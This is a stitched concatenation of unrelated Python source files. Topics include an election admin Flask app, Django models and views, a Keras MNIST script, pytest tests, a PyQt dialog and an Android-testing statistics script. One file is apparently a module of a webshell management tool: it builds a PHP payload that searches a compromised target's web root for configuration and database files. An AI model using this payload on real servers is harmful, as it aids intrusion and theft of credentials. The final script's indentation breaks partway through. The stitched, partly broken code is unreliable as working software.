        racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
            user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
            host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
        )
        models.database_proxy.initialize(racedate_db)
        payload = utils.clean_payload(dict(request.form))
        try:
            r = models.OverrideRace.get(models.OverrideRace.race_unique_id==raceid)
        except models.OverrideRace.DoesNotExist:
            r = models.OverrideRace.create(
                race_unique_id=raceid,
                raceid=raceid.split('-')[1],
                statepostal=raceid.split('-')[0])
        # nyt_winner is a single ID, there can only be one winner.
        utils.set_winner(payload['nyt_winner'], raceid)
        print(payload)
        # nyt_runoff is a list of ids, there can be 2 or more advancing.
        runoff_cands = []
        if payload.get('nyt_runoff', None):
            runoff_cands = [x.strip() for x in payload['nyt_runoff'].split(',')]
        utils.set_runoff(runoff_cands, raceid)
        utils.update_model(r, payload)
        utils.update_views(models.database_proxy)
        return json.dumps({"message": "success"})
@app.route('/elections/<raceyear>/admin/<racedate>/candidate/<candidateid>/', methods=['POST'])
def candidate_detail(racedate, candidateid, raceyear):
    """Create or update an OverrideCandidate from posted form data and
    refresh the views."""
    racedate_db = PostgresqlExtDatabase('elex_%s' % racedate,
        user=os.environ.get('ELEX_ADMIN_USER', 'elex'),
        host=os.environ.get('ELEX_ADMIN_HOST', '127.0.0.1')
    )
    models.database_proxy.initialize(racedate_db)
    if request.method == 'POST':
        payload = utils.clean_payload(dict(request.form))
        # EAFP: fetch the existing override or create a fresh one.
        try:
            oc = models.OverrideCandidate.get(models.OverrideCandidate.candidate_unique_id == candidateid)
        except models.OverrideCandidate.DoesNotExist:
            oc = models.OverrideCandidate.create(candidate_unique_id=candidateid)
        utils.update_model(oc, payload)
        utils.update_views(models.database_proxy)
        return json.dumps({"message": "success"})
@app.route('/elections/<raceyear>/admin/<racedate>/loader/timeout/', methods=['POST'])
def set_loader_timeout(racedate, raceyear):
    """Persist the loader timeout by writing an env-var export to /tmp.

    SECURITY: *timeout* comes from the request body and is interpolated
    into a shell command; accept digits only to prevent command injection.
    """
    if request.method == 'POST':
        payload = utils.clean_payload(dict(request.form))
        timeout = payload.get('timeout', '')
        if not str(timeout).isdigit():
            return json.dumps({"message": "invalid timeout", "output": "1"})
        os.system('echo export ELEX_LOADER_TIMEOUT=%s > /tmp/elex_loader_timeout.sh' % timeout)
        return json.dumps({"message": "success", "output": "0"})
if __name__ == '__main__':
    # Allow overriding the default port (8001) with -p/--port.
    parser = argparse.ArgumentParser()
    parser.add_argument('-p', '--port')
    args = parser.parse_args()
    server_port = 8001
    if args.port:
        server_port = int(args.port)
    app.run(host='0.0.0.0', port=server_port, debug=True)
|
import os
from django.db import models
from django.conf import settings
from django.utils import timezone
from django.utils.translation import gettext as _
from django.conf import settings
from django.dispatch import receiver
from django.db.models.signals import post_save
class Profile(models.Model):
    """Wraps the auth User in a one-to-one Profile holding fitness data
    (bio, measurements, accumulated points and a friend list)."""
    user = models.OneToOneField(settings.AUTH_USER_MODEL, related_name='profile', on_delete=models.CASCADE, primary_key=True)
    signup_date = models.DateField(verbose_name="User signup date")
    # BUGFIX: "picure" -> "picture" in the user-visible verbose name.
    profile_photo = models.ImageField(verbose_name="Profile picture", upload_to='profile_photos/', null=True)
    bio = models.CharField(verbose_name="User Bio", max_length=200, null=True)
    height = models.PositiveSmallIntegerField(verbose_name="Height in inches", null=True)  # Doesn't allow for fractional height, integers only
    weight = models.PositiveSmallIntegerField(verbose_name="Weight in pounds", null=True)
    points = models.PositiveIntegerField(verbose_name="Total accumulated points", default=0)
    # BUGFIX: null=True has no effect on ManyToManyField (Django warning
    # fields.W340); an empty relation already means "no friends".
    friends = models.ManyToManyField("self", symmetrical=True, verbose_name="Friend list")

    def __str__(self):
        return self.user.first_name + " " + self.user.last_name + "(" + str(self.pk) + "): " + str(self.points) + " accumulated points"

    # Get the profile photo path for the user
    # Returns just a placeholder if not set, otherwise returns the actual photo
    # The heroku filesystem is ephemeral, so photos get deleted over time.
    def photo_or_placeholder(self):
        if self.profile_photo and hasattr(self.profile_photo, 'url'):
            return self.profile_photo.url
        return settings.STATIC_URL + 'profile_placeholder.jpg'

    # Get the human-readable height for a user.
    # Returns a tuple of (feet, inches) which is (0,0) on invalid input
    @property
    def readable_height(self):
        # Integer divide by 12 to get feet, remainder is inches
        if not self.height or self.height <= 0:
            return (0, 0)
        ft = self.height // 12
        inches = self.height % 12
        return (ft, inches)

    class Meta:
        # Leaderboard ordering: highest points first.
        ordering = ['-points']
# Allauth fires a post_save signal when a new user signs up.
# We can catch this signal and create a sensible default profile and initialize the one-to-one relationship.
# Citation: http://www.marinamele.com/taskbuster-django-tutorial/model-creation-onetoone-relationship-signals-django-admin
@receiver(post_save, sender = settings.AUTH_USER_MODEL)
def create_profile(sender, created, instance, **kwargs):
    """Create a default Profile the first time a User row is saved."""
    # The signal fires multiple times, so we need to make sure that this one is the actual creator of the user profile.
    if created:
        new_profile = Profile(user = instance, bio="Placeholder bio", signup_date=timezone.now())
        new_profile.save()
### NOT CURRENTLY BEING USED (REFER INSTEAD TO dashboard/models.py) - DO NOT DELETE, CONTAINS USEFUL CODE ###
#class Exercise(models.Model):
# # Create an Exercise model that can store the basic information about exercises that a user would complete
# # Each Profile would then have an associated list of exercise objects, each instance referring to the date the exercise was recorded
# # Workout dropdown categories for the type of exercise, body part exercised, and workout intensity conducted
# TYPES_OF_EXERCISE = (
# (1, _('Balance')),
# (2, _('Cardio')),
# (3, _('Flexibility')),
# (4, _('Strength')),
# (5, _('Other')),
# )
# TYPES_OF_BODY_PARTS = (
# (1, _('Abdominals')),
# (2, _('Arms')),
# (3, _('Back')),
# (4, _('Chest')),
# (5, _('Legs')),
# (6, _('Shoulders')),
# (7, _('Other')),
# )
# INTENSITY = (
# (1, _('Low')),
# (2, _('Moderate')),
# (3, _('Vigorous')),
# )
# # Exercise fields
# entry_date = models.DateTimeField(verbose_name="Date and Time of Workout")
# exercise_type = models.CharField(max_length=15, choices=TYPES_OF_EXERCISE, default=1,)
# body_part_exercised = models.CharField(max_length=15, choices=TYPES_OF_BODY_PARTS, default=1,)
# exercise_intensity = models.CharField(max_length=15, choices=INTENSITY, default=1,)
# time = models.PositiveSmallIntegerField(verbose_name="Length of Workout (in minutes)", null=True)
# journal = models.CharField(verbose_name="Post-Workout Thoughts", max_length=200, null=True)
# points_earned = models.PositiveIntegerField(verbose_name="Points from Workout", default=5)
#
# def __str__(self):
# return "Earned " + str(self.points_earned) + " with a workout on " + self.entry_date + ", focused on " + self.body_part_exercised + " with " + self.exercise_type + " exercises for " + str(self.time) + " minutes"
#####################################
# RUNNING LIST OF SOURCES
# Source for Exercise Model: https://www.merixstudio.com/blog/django-models-declaring-list-available-choices-right-way/
# Source for Types of Exercise: https://www.bupa.co.uk/health-information/exercise-fitness/types-of-exercise
# Muscle Group Workout Information: https://www.medicalnewstoday.com/articles/muscle-groups-to-work-out-together#which-muscle-groups-to-pair
# DateTime Field: https://www.geeksforgeeks.org/datetimefield-django-models/
# Intensity Scale: https://en.wikipedia.org/wiki/Exercise_intensity
# Model Format: https://docs.djangoproject.com/en/3.1/intro/tutorial02/
######################################
|
from libs.config import alias, gget
from libs.myapp import send, color, print_tree
from json import JSONDecodeError
def get_php(file_path: str) -> str:
    """Build the PHP payload that recursively scans *file_path* for files
    whose names contain a config-related keyword (cfg/config/db/database).

    The payload prints a JSON tree whose directory keys and file leaves
    are base64-encoded names (decoded later by print_tree).
    """
    return """$cfgs=array("cfg","config","db","database");
function filter($v,$vv){
return strstr($v, $vv);
}
function scan_rescursive($directory) {
global $cfgs;
$res = array();
foreach(glob("$directory/*") as $item) {
if(is_dir($item)) {
$items=explode('/', $item);
$folder = base64_encode(end($items));
$res[$folder] = scan_rescursive($item);
continue;
}
else if (count(array_filter(array_map("filter", array_fill(0, count($cfgs), $item), $cfgs)))){
$res[] = base64_encode(basename($item));
}
}
return $res;
}
print(json_encode(scan_rescursive("%s")));""" % file_path
@alias(True, _type="DETECT", fp="web_file_path")
def run(web_file_path: str = ""):
    """
    fc
    Search config file from target system.
    eg: fc {web_file_path=webroot}
    """
    # Fall back to the webshell's document root when no path was given.
    if not len(web_file_path):
        web_file_path = gget("webshell.root", "webshell")
    payload = get_php(web_file_path)
    try:
        result = send(payload)
        if not result:
            return
        file_tree = result.r_json()
    except JSONDecodeError:
        print(color.red("Parse Error"))
        return
    print_tree(web_file_path, file_tree)
|
class Solution(object):
    def flatten(self, root):
        """Flatten a binary tree into a right-leaning list, in place,
        following preorder traversal order.

        Iterative form: for each node with a left child, splice the
        right subtree onto the rightmost node of the left subtree, then
        rotate the left subtree into the right slot.
        """
        node = root
        while node is not None:
            if node.left is not None:
                # Find the rightmost node of the left subtree.
                tail = node.left
                while tail.right is not None:
                    tail = tail.right
                # Splice: left subtree takes over the right slot.
                tail.right = node.right
                node.right = node.left
                node.left = None
            node = node.right
|
from xml.etree import ElementTree
import adsk.core
import adsk.fusion
import traceback
# Reads XML data from attribute returns element tree root element
def get_xml_from_attribute(group_name, attribute_name, root_name):
    """Return the XML root element stored in a design attribute.

    Looks up attribute (group_name, attribute_name) on the active
    Fusion 360 design.  If present, its value is parsed as XML and that
    root is returned; otherwise a fresh empty element named *root_name*
    is returned.
    """
    app = adsk.core.Application.get()
    design = adsk.fusion.Design.cast(app.activeProduct)
    attrib = design.attributes.itemByName(group_name, attribute_name)
    if attrib is None:
        # No saved data yet: hand back an empty root to build on.
        return ElementTree.Element(root_name)
    return ElementTree.fromstring(attrib.value)
# Builds a drop down menu for all states of the given type
def build_drop_down(inputs, title, group_name, attrib_name, root_name, is_check_box=False):
    """Build a drop-down command input listing all saved states.

    When is_check_box is True a multi-select (checkbox) drop-down with
    id 'select_state' is created; otherwise a single-select drop-down
    with id 'currentState' that gets a leading, pre-selected 'Current'
    entry.  Saved states from the attribute XML are appended in both
    cases via update_drop_down().
    """
    if is_check_box:
        drop_down = inputs.addDropDownCommandInput('select_state', title,
                                                   adsk.core.DropDownStyles.CheckBoxDropDownStyle)
        drop_down_items = drop_down.listItems
    else:
        drop_down = inputs.addDropDownCommandInput('currentState', title,
                                                   adsk.core.DropDownStyles.TextListDropDownStyle)
        drop_down_items = drop_down.listItems
        # 'Current' represents the live (unsaved) state and starts selected.
        drop_down_items.add('Current', True)
    update_drop_down(drop_down_items, group_name, attrib_name, root_name)
def update_drop_down(drop_down_items, group_name, attrib_name, root_name):
    """Append one (unselected) entry per saved <state> element."""
    state_root = get_xml_from_attribute(group_name, attrib_name, root_name)
    # Element truthiness: only a root with child elements is truthy.
    if state_root:
        for state_node in state_root.findall('state'):
            drop_down_items.add(state_node.get('name'), False, )
# Processes values from a state if a new one is selected
def process_values(inputs, group_name, attrib_name, xml_read_function, root_name):
    """Apply a saved state's values when a new one is selected.

    Reads the 'currentState' drop-down; anything other than 'Current'
    triggers loading the attribute XML and calling *xml_read_function*
    with the root and the selected state name.
    """
    state = inputs.itemById('currentState').selectedItem.name
    if state != 'Current':
        root = get_xml_from_attribute(group_name, attrib_name, root_name)
        # Element truthiness: only proceed when the root has children.
        if root:
            xml_read_function(root, state)
# Saves values for the given state type into proper attribute XML
def save_values(inputs, group_name, attrib_name, xml_write_function, root_name):
    """Save the current input values as a named state in attribute XML.

    *xml_write_function* receives the existing XML root, the value of
    the 'newName' input, and the active design; its returned XML string
    overwrites the attribute (group_name, attrib_name).
    """
    app = adsk.core.Application.get()
    design = adsk.fusion.Design.cast(app.activeProduct)
    root = get_xml_from_attribute(group_name, attrib_name, root_name)
    xml_string = xml_write_function(root, inputs.itemById('newName').value, design)
    # attributes.add overwrites any existing value for this key.
    design.attributes.add(group_name, attrib_name, xml_string)
|
# Two identical sample records: [id, name, age, address].
my_big_data = [
    ['a001', '홍길동', 29, '신암동 12-4'],
    ['a001', '홍길동', 29, '신암동 12-4'],
]
print(my_big_data)
|
import os
import struct
import numpy as np
import matplotlib.pyplot as plt
from keras.models import Sequential
from keras.layers.core import Dense
from keras.optimizers import SGD
from keras.utils import np_utils
def load_mnist(path, which='train'):
    """Load raw MNIST idx files located under *path*.

    which -- 'train' or 'test' (test selects the t10k files).
    Returns (images, labels): uint8 arrays of shape (n, 784) and (n,).
    Raises AttributeError for any other value of *which*.
    """
    if which == 'train':
        prefix = 'train'
    elif which == 'test':
        prefix = 't10k'
    else:
        raise AttributeError('`which` must be "train" or "test"')
    labels_path = os.path.join(path, '{0}-labels-idx1-ubyte'.format(prefix))
    images_path = os.path.join(path, '{0}-images-idx3-ubyte'.format(prefix))
    with open(labels_path, 'rb') as lbpath:
        # Skip the 8-byte header (magic number + item count).
        struct.unpack('>II', lbpath.read(8))
        labels = np.fromfile(lbpath, dtype=np.uint8)
    with open(images_path, 'rb') as imgpath:
        # Skip the 16-byte header (magic, count, rows, cols).
        struct.unpack('>IIII', imgpath.read(16))
        images = np.fromfile(imgpath, dtype=np.uint8).reshape(len(labels), 784)
    return images, labels
def plot_digit(X, y, idx):
    """Display sample *idx* of X (flattened 28x28 images) with its true label."""
    img = X[idx].reshape(28,28)
    plt.imshow(img, cmap='Greys', interpolation='nearest')
    plt.title('true label: %d' % y[idx])
    # Blocks until the window is closed.
    plt.show()
# Load the full train/test splits from the local dataset directory.
X,y = load_mnist('../../datasets/mnist')
X_t,y_t = load_mnist('../../datasets/mnist', which='test')
# One-hot encode the training labels.
y_c=np_utils.to_categorical(y)
# 784-50-50-10 MLP.  NOTE(review): `init=`, `output_dim=`, `nb_epoch=` and
# `show_accuracy=` are Keras 1.x API names -- presumably this script
# requires Keras 1.x; it will not run unmodified on Keras 2+.
model = Sequential()
model.add(Dense(input_dim=X.shape[1],output_dim=50,init='uniform',activation='tanh'))
model.add(Dense(input_dim=50, output_dim=50,init='uniform',activation='tanh'))
model.add(Dense(input_dim=50, output_dim=y_c.shape[1],init='uniform',activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer=SGD(lr=0.001, decay=1e-7, momentum=0.9))
model.fit(X,y_c,nb_epoch=50,batch_size=300,verbose=1,validation_split=0.1,show_accuracy=True)
# Evaluate by comparing predicted classes on the held-out test split.
y_t_p = model.predict_classes(X_t, verbose=0)
print(('Test accuracy: %.2f%%' % (float(np.sum(y_t == y_t_p, axis=0)) / X_t.shape[0] * 100)))
from django.shortcuts import render
from rest_framework import generics
from rest_framework.decorators import api_view
from rest_framework.response import Response
from tweets.models import Tweet
from users.models import UserAccount
from tweets.serializers import TweetSerializer
from users.serializers import UserSerializered
from datetime import datetime
# Create your views here.
class TweetList(generics.ListCreateAPIView):
    """GET: list all tweets; POST: create a new tweet."""
    queryset = Tweet.objects.all()
    serializer_class = TweetSerializer
@api_view(['POST'])
def details(request):
    """Return the single tweet identified by POST body field 'id'.

    Raises Tweet.DoesNotExist when the id is unknown.
    """
    requested_tweet = Tweet.objects.get(id=request.data['id'])
    data = TweetSerializer(requested_tweet, many=False).data
    return Response(data)
@api_view(['POST'])
def bookmakrs(request):
    """Return the serialized tweets bookmarked by the requesting user.

    Expects POST body {"user_bookmarks": [{"tweet_id": <id>, ...}, ...]}.
    Preserves the submitted order.  Raises Tweet.DoesNotExist when any
    bookmarked tweet id is unknown.

    Note: the historical misspelling of the view name is kept because
    URL configuration elsewhere may reference it by name.
    Fix: removed a leftover debug `print` of the result list.
    """
    bookmarked_tweets = [
        Tweet.objects.get(id=entry['tweet_id'])
        for entry in request.data['user_bookmarks']
    ]
    serializer = TweetSerializer(bookmarked_tweets, many=True)
    return Response(serializer.data)
@api_view(['POST'])
def following(request):
    """Return all tweets authored by the users the requester follows.

    Expects POST body {"userTo": [{"user_to": <user_id>, ...}, ...]}.
    """
    followed_tweets = []
    for entry in request.data['userTo']:
        # Distinct loop variables (the original reused `v` for both loops).
        for tweet in Tweet.objects.all().filter(user_id=entry['user_to']):
            followed_tweets.append(tweet)
    serializer = TweetSerializer(followed_tweets, many=True)
    return Response(serializer.data)
@api_view(['POST'])
def search(request):
    """Case-insensitive substring search over tweet content."""
    matches = Tweet.objects.filter(content__icontains=request.data['content'])
    return Response(TweetSerializer(matches, many=True).data)
|
import pytest
from restdoctor.utils.media_type import parse_accept
def test_parse_none():
    """A missing Accept header (None) parses to None."""
    result = parse_accept(None)
    assert result is None
@pytest.mark.parametrize(
    'header,expected_version',
    (
        ('*/*', 'fallback'),
        ('text/html', 'fallback'),
        ('application/json', 'fallback'),
        ('application/vnd.bestdoctor', 'default'),
    ),
)
def test_parse_accept_fallback(settings, header, expected_version):
    """With API_FALLBACK_FOR_APPLICATION_JSON_ONLY disabled, every
    non-vendor Accept header resolves to the fallback version; the
    vendor media type still resolves to the default version."""
    settings.API_FALLBACK_VERSION = 'fallback'
    settings.API_DEFAULT_VERSION = 'default'
    settings.API_VERSIONS = {
        'v1': 'v1',
        'v2': 'v2',
    }
    settings.API_FALLBACK_FOR_APPLICATION_JSON_ONLY = False
    result = parse_accept(header)
    assert expected_version == result.version
@pytest.mark.parametrize(
    'header,expected_version',
    (
        ('*/*', 'default'),
        ('text/html', 'default'),
        ('application/json', 'fallback'),
        ('application/vnd.bestdoctor', 'default'),
    ),
)
def test_parse_accept_default(settings, header, expected_version):
    """With API_FALLBACK_FOR_APPLICATION_JSON_ONLY enabled, only
    application/json triggers the fallback version; other headers get
    the default version."""
    settings.API_FALLBACK_VERSION = 'fallback'
    settings.API_DEFAULT_VERSION = 'default'
    settings.API_VERSIONS = {
        'v1': 'v1',
        'v2': 'v2',
    }
    settings.API_FALLBACK_FOR_APPLICATION_JSON_ONLY = True
    result = parse_accept(header)
    assert expected_version == result.version
@pytest.mark.parametrize(
    'header,expected_version',
    (
        ('application/vnd.bestdoctor', 'default'),
        ('application/vnd.bestdoctor.v1', 'v1'),
        ('application/vnd.bestdoctor.v1.full', 'v1'),
        ('application/vnd.bestdoctor.v1.full+json', 'v1'),
        ('application/vnd.bestdoctor.v2', 'v2'),
        ('application/vnd.bestdoctor.v2.full', 'v2'),
        ('application/vnd.bestdoctor.v2.full+json', 'v2'),
        ('application/vnd.bestdoctor.v3', 'default'),
        ('application/vnd.bestdoctor.v3.full', 'default'),
        ('application/vnd.bestdoctor.v3.full+json', 'default'),
    ),
)
def test_parse_accept_versions(settings, header, expected_version):
    """Versions present in API_VERSIONS are honored from the vendor media
    type (with or without format/suffix); unknown versions (v3) and a
    bare vendor type resolve to the default version."""
    settings.API_FALLBACK_VERSION = 'fallback'
    settings.API_DEFAULT_VERSION = 'default'
    settings.API_VERSIONS = {
        'v1': 'v1',
        'v2': 'v2',
    }
    result = parse_accept(header)
    assert expected_version == result.version
@pytest.mark.parametrize(
    'vendor,expected_vendor',
    (
        (None, 'vendor'),
        ('', 'vendor'),
        ('my_vendor', 'my_vendor'),
    ),
)
def test_parse_accept_vendor_success_case(vendor, expected_vendor):
    """An explicit vendor argument overrides the parsed vendor; falsy
    values (None, '') fall back to the default 'vendor'."""
    result = parse_accept('application/vnd', vendor=vendor)
    assert expected_vendor == result.vendor
|
# Basic string slicing, formatting, and method demonstrations.
name = "Sam"
print("Name is :", name)
# Slice from index 1: everything after the first character ("am").
lastletters = name[1:]
print("LastLetters of name are : ", lastletters)
# Repetition and mixing strings with other print arguments.
print(lastletters * 4)
print("I ", lastletters , "super cool")
# Three equivalent ways to interpolate an expression into output.
print('Sum of 2 and 3 is: ', 2+3)
print(f'Sum of 2 and 3 is : {2+3}')
print('Sum of 2 and 3 is: {}'.format(2+3))
# `+` on str values concatenates instead of adding numerically.
print("2 concatenated with 3 is :", '2' + '3')
print("2 concatenated with 3 is :{}".format('2' + '3'))
print(f"2 concatenated with 3 is: {'2'+ '3'}")
message = "Today is a beautiful day!"
# Prepend "Hello!" to the message five times.
for i in range(5):
    message = 'Hello!' + message
print(message)
#String Methods
x = 'Hello World!'
print('Using upper method for ',x , 'gives ', x.upper())
print('Using lower method on ', x , 'gives ', x.lower())
print('Using split method on ', x, 'gives ', x.split())
x = 'This is a nice string'
print('Splitting "',x , ' " by letter i gives ', x.split('i'))
|
from PyQt5.QtWidgets import QWidget, QDialog
from PyQt5.QtGui import QImage, QPalette, QBrush
from PyQt5.QtCore import QSize, Qt
import main_menu
SCREEN_SIZE = [700, 700]
class LostWindow(QDialog, QWidget):
    """Fixed-size modal dialog shown at game end.

    NOTE(review): the class is named LostWindow and loads
    'lost/lost.png', but the window title is 'ПОБЕДА' (Russian for
    "VICTORY") -- confirm which outcome this screen represents.
    Pressing Space closes the dialog and opens the main menu.
    """
    def __init__(self):
        super().__init__()
        self.setModal(True)
        self.initUI()

    def initUI(self):
        # Title string is user-facing; kept as-is (see class note).
        self.setWindowTitle('ПОБЕДА')
        self.setFixedSize(*SCREEN_SIZE)
        # Scale the background image to the window and paint it via palette.
        oImage = QImage('lost/lost.png')
        sImage = oImage.scaled(QSize(*SCREEN_SIZE))
        palette = QPalette()
        palette.setBrush(QPalette.Window, QBrush(sImage))
        self.setPalette(palette)

    def keyPressEvent(self, event):
        # Space dismisses this dialog and brings up the main menu.
        if event.key() == Qt.Key_Space:
            self.close()
            self.main_menu = main_menu.MainMenu()
            self.main_menu.show()
|
import time
from datetime import datetime
from os.path import join as path_join
from math import log, floor
import click
import matplotlib
matplotlib.rcParams['font.family'] = 'serif'
matplotlib.rcParams['mathtext.fontset'] = 'cm'
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import pandas
import numpy as np
from tabulate import tabulate
import tabulate as T
from scipy.stats import mannwhitneyu
from scipy.stats import ks_2samp
from scipy.stats import shapiro
from scipy.stats import ttest_ind
from scipy.stats import zscore
from statsmodels.sandbox.stats.multicomp import multipletests
from scipy.stats import chi2_contingency
# Column names in the results CSV flagging use of each GUI-automation framework.
ui_automation_frameworks = [
    "androidviewclient",
    'appium',
    'calabash',
    'espresso',
    'monkeyrunner',
    'pythonuiautomator',
    'robotium',
    'uiautomator',
]
# Cloud-based device/test services.
cloud_test_services = [
    'projectquantum',
    'qmetry',
    'saucelabs',
    'firebase',
    'perfecto',
    'bitbar',
]
# Unit-testing frameworks.
unit_test_frameworks = [
    'junit',
    'androidjunitrunner',
    'roboelectric',
    'robospock',
]
# Continuous-integration services.
ci_services = [
    'travis',
    'circleci',
    'app_veyor',
    'codeship',
    'codefresh',
    'wercker',
]
# Ordered category labels for the Google Play download-count buckets.
downloads_scale = [
    '1 - 5',
    '10 - 50',
    '50 - 100',
    '100 - 500',
    '500 - 1,000',
    '1,000 - 5,000',
    '5,000 - 10,000',
    '10,000 - 50,000',
    '50,000 - 100,000',
    '100,000 - 500,000',
    '500,000 - 1,000,000',
    '1,000,000 - 5,000,000',
    '5,000,000 - 10,000,000',
    '10,000,000 - 50,000,000',
    '50,000,000 - 100,000,000',
    '100,000,000 - 500,000,000',
    '500,000,000 - 1,000,000,000',
    '1,000,000,000 - 5,000,000,000',
    '5,000,000,000 - 10,000,000,000',
]
def human_format(number):
    """Format a count with a metric suffix, e.g. 1200 -> '1K'.

    Fixes: the original raised ValueError for number <= 0 (log of a
    non-positive value) and for 0 < number < 1 produced magnitude -1;
    it also indexed past `units` for values >= 1000**6.  Values below 1
    are now printed without a suffix and the magnitude is clamped.
    """
    units = ['', 'K', 'M', 'G', 'T', 'P']
    k = 1000.0
    if number < 1:
        # log() is undefined or negative here; no suffix applies.
        return '%.0f' % number
    magnitude = int(floor(log(number, k)))
    magnitude = min(magnitude, len(units) - 1)
    return '%.0f%s' % (number / k**magnitude, units[magnitude])
@click.command()
@click.option('-i','--results_input', default=".", type=click.Path(exists=True))
@click.option('-o','--results_output', default="./reports", type=click.Path(exists=True))
def reports(results_input, results_output):
    """Generate reports for EMSE paper."""
    # Fixed snapshot date used for all age / staleness computations.
    now = pandas.Timestamp(2017, 9, 30, 12)
    # Columns 0 and 10 are parsed as dates (created_at / last_updated below).
    df = pandas.read_csv(
        path_join(results_input, "results_with_coverage.csv"),
        parse_dates=[0, 10]
    )
    df_googleplay = pandas.read_csv(
        path_join(results_input, "googleplay.csv"),
        index_col='package'
    )
    df = df.join(df_googleplay, on="app_id")
    # NOTE(review): read from the working directory rather than
    # results_input like the other inputs -- confirm this is intended.
    df_sonar = pandas.read_csv("results_sonar.csv", index_col='package')
    df_sonar.fillna(0, inplace=True)
    df_sonar = df_sonar.add_prefix('sonar_')
    df = df.join(df_sonar, on="app_id")
    #Feature engineering
    # Boolean flags: does the app use any framework of each category?
    df['tests'] = df[unit_test_frameworks+ui_automation_frameworks+cloud_test_services].any(axis=1)
    df['unit_tests'] = df[unit_test_frameworks].apply(any, axis=1)
    df['ui_tests'] = df[ui_automation_frameworks].apply(any, axis=1)
    df["cloud_tests"] = df[cloud_test_services].apply(any, axis=1)
    df["ci/cd"] = df[ci_services].apply(any, axis=1)
    # Age as timedelta and as whole years ('<m8[Y]' truncates to years).
    df['age'] = (now - df['created_at'])
    df['age_numeric'] = (now - df['created_at']).astype('<m8[Y]').astype('int')
    df['time_since_last_update'] = (now - df['last_updated'])
    df['time_since_last_update_numeric'] = df['time_since_last_update'].astype('<m8[Y]').astype('int')
    # Projects at least two years old.
    df_old = df[df['age_numeric']>=2]
    # Ordered categorical for download buckets (older pandas API signature).
    df["downloads"] = df["downloads"].astype("category", categories=downloads_scale, ordered=True)
    # Normalize Sonar issue counts by the number of files processed.
    df['sonar_issues_ratio'] = df['sonar_issues'].divide(df['sonar_files_processed'])
    df['sonar_blocker_issues_ratio'] = df['sonar_blocker_issues'].divide(df['sonar_files_processed'])
    df['sonar_critical_issues_ratio'] = df['sonar_critical_issues'].divide(df['sonar_files_processed'])
    df['sonar_major_issues_ratio'] = df['sonar_major_issues'].divide(df['sonar_files_processed'])
    df['sonar_minor_issues_ratio'] = df['sonar_minor_issues'].divide(df['sonar_files_processed'])
    # Convenience subsets.
    df_with_google_data = df[~df["rating_count"].isnull()]
    df_with_tests = df[df['tests']]
    df_without_tests = df[~df['tests']]
    df.to_csv("results_merged.csv")
    # Per-category plot colors (matplotlib default cycle names) and markers.
    colors_dict = {
        'any': 'C0',
        'unit_test_frameworks': 'C1',
        'ui_automation_frameworks': 'C2',
        'cloud_test_services': 'C3',
        'ci_services': 'C4',
    }
    marker_dict = {
        'any': 'o',
        'unit_test_frameworks': 'v',
        'ui_automation_frameworks': '*',
        'cloud_test_services': 'H',
        'ci_services': 's',
    }
    # --- Number of projects by framework --- #
    columns = (
        ['tests']
        + ['unit_tests'] + unit_test_frameworks
        + ['ui_tests'] + ui_automation_frameworks
        + ['cloud_tests'] + cloud_test_services
        # + ['ci/cd'] + ci_services
    )
    colors = (
        [colors_dict['any']] +
        [colors_dict['unit_test_frameworks']] * (len(unit_test_frameworks) + 1)
        + [colors_dict['ui_automation_frameworks']] * (len(ui_automation_frameworks) + 1)
        + [colors_dict['cloud_test_services']] * (len(cloud_test_services) + 1)
        + [colors_dict['ci_services']] * (len(ci_services) + 1)
    )
    # Aggregate columns to visually emphasize in the chart.
    highlights = [
        'tests',
        'unit_tests',
        'ui_tests',
        'cloud_tests',
        'ci/cd',
    ]
# --- Percentage of Android tests over the age of the apps (cumulated) --- #
    def tests_in_projects_by_time_of_creation_cumm(df_projects, frameworks,
                                                   title=None, verbose=False, **kwargs):
        """Plot the cumulative share of ALL projects (denominator is
        len(df_projects)) that use any of *frameworks*, accumulated from
        oldest to newest creation year; x values are reversed ages.

        NOTE(review): the verbose branch references an undefined name
        `portion` and would raise NameError when verbose=True.
        """
        project_with_test_per_age = []
        total_projects_per_age = []
        n_projects_with_tests_history = []
        total_projects_history = []
        age_max = df_projects['age_numeric'].max()+1
        # Iterate ages oldest-first (reversed range).
        for age in range(age_max)[::-1]:
            n_projects_with_tests = df_projects[df_projects['age_numeric']==age][frameworks].apply(any, axis=1).sum()
            n_projects_with_tests_history.append(n_projects_with_tests)
            total_projects = len(df_projects[df_projects['age_numeric']==age].index)
            total_projects_history.append(total_projects)
            project_with_test_per_age.append(n_projects_with_tests)
            total_projects_per_age.append(total_projects)
            if verbose:
                print("Age {}:".format(age))
                print("{} out of {} projects ({:.1%}).".format(n_projects_with_tests, total_projects, portion))
        # Running (cumulative) sums along the age axis.
        project_with_test_per_age_cum = [sum(project_with_test_per_age[:index+1]) for index in range(len(project_with_test_per_age))]
        total_projects_per_age_cum = [sum(total_projects_per_age[:index+1]) for index in range(len(total_projects_per_age))]
        portions = []
        for with_tests, total in zip(project_with_test_per_age_cum, total_projects_per_age_cum):
            if total > 0:
                # Share of the WHOLE population, not of projects seen so far.
                portions.append(with_tests/len(df_projects))
            else:
                portions.append(0)
        plt.plot(range(age_max)[::-1], portions, **kwargs)
        # plt.scatter(range(age_max), portions, total_projects_history, marker='o', linewidth='1', zorder=zorder)
        ax = plt.gca()
        ax.spines['right'].set_visible(False)
        ax.spines['top'].set_visible(False)
        ax.spines['left'].set_visible(False)
        ax.set_xticks(range(age_max)[::-1])
        ax.set_yticklabels(["{:.0%}".format(label) for label in ax.get_yticks()])
        ax.set_ylabel("Percentage of projects")
        ax.yaxis.grid(linestyle='dotted', color='gray')
        ax.legend(loc='upper center', shadow=False)
        if title:
            ax.set_title(title)
figure, ax = plt.subplots(1,1)
tests_in_projects_by_time_of_creation_cumm(
df,
unit_test_frameworks+ui_automation_frameworks+cloud_test_services,
label="Any", color=colors_dict['any'], zorder=2,
marker=marker_dict['any'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
unit_test_frameworks,
label="Unit testing", color=colors_dict['unit_test_frameworks'], zorder=3,
#linestyle=linestyle_dict['unit_test_frameworks']
marker=marker_dict['unit_test_frameworks'],
)
tests_in_projects_by_time_of_creation_cumm(
df,
ui_automation_frameworks,
label="GUI testing", color=colors_dict['ui_automation_frameworks'], zorder=4,
marker=marker_dict['ui_automation_frameworks'],
)
